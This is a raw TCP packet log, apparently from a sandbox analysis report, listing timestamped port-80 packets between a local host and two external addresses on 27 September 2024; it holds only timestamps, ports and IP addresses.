Sep 27, 2024 04:21:16.851181984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851198912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851264954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851273060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851277113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851305008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851330996 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851725101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851737022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851747990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851768017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851788998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851876974 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851893902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851905107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851913929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851916075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851927996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851939917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851950884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851952076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851963043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851974010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851980925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851988077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851999044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852000952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852016926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852026939 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852047920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852054119 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852061033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852072001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852082014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852082014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852094889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852104902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852109909 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852117062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852128983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852129936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852139950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852163076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852180004 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852334023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852344990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852355957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852369070 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852392912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852490902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852502108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852513075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852523088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852525949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852549076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852572918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.852663040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852674007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852684975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852694035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852705956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852827072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852838993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852849007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852860928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852962017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852972984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.852983952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853024006 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853053093 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853110075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853121996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853132963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853141069 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853144884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853157997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853157997 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853182077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853209019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853775978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853789091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853800058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853813887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853836060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.853956938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853967905 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853980064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853990078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.853995085 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.854012966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.854042053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.854434013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854444027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854455948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854469061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854475021 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.854480028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854492903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854502916 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.854502916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854522943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.854541063 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.854554892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.854592085 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.857461929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857511997 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.857597113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857608080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857619047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857630014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857637882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.857640982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857656956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.857672930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.857728004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857739925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.857763052 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.857785940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.857912064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.857956886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858093023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858128071 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858270884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858284950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858294010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858306885 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858313084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858323097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858328104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858350039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858365059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858438969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858450890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858462095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858470917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858480930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858481884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858494043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858500957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858509064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858536959 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858570099 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858577967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858587980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.858613014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.858629942 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.859395981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.859462023 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.859584093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.859596014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.859606028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.859616041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.859626055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.859627008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.859638929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.859639883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.859668970 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.859694004 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.885083914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885099888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885119915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885132074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885143042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885154963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885173082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885186911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.885193110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885207891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885219097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885247946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.885247946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.885268927 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.885298967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885312080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885322094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885334015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885341883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.885345936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.885353088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.885382891 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.885407925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.893053055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893090010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893106937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893121004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893122911 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.893132925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893157959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893162966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.893162966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.893172026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893177032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.893177032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.893184900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.893198967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.893205881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.893224001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.894979954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895034075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.895037889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895051956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895062923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895077944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.895093918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.895097971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895111084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895122051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895133972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.895136118 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.895163059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.895184994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899137974 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899166107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899178028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899192095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899204016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899204969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.899219990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899225950 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.899234056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899246931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.899256945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.899275064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.899293900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.899570942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899621964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899678946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899689913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899708033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899719000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899719954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899728060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899732113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899746895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899746895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899755955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899760008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.899775982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899784088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.899801016 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.900279045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.900327921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.900379896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.900392056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.900405884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.900412083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.900422096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.900422096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.900435925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.900449038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.900475025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901428938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901439905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901458025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901469946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901475906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901482105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901487112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901494980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901505947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901510000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901525974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901540995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901562929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901855946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901897907 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901906013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901918888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901931047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.901945114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901962042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.901969910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902045012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902055025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902066946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902086020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902091980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902096987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902108908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902108908 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902122974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902132988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902136087 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902153015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902162075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902163982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902177095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902185917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902189016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902208090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902211905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902225018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902234077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902251005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902271986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902313948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902327061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902337074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902347088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902350903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902360916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902364016 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902380943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902381897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902393103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902405024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902405977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902429104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902450085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902847052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902879953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902890921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902896881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902915955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902925968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902940035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902954102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902966022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902976990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.902980089 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.902996063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.903009892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903021097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.903023005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903045893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903048038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.903057098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.903084040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.903131008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903143883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903153896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903165102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903173923 CEST	49725	80	192.168.2.5	185.215.113.117
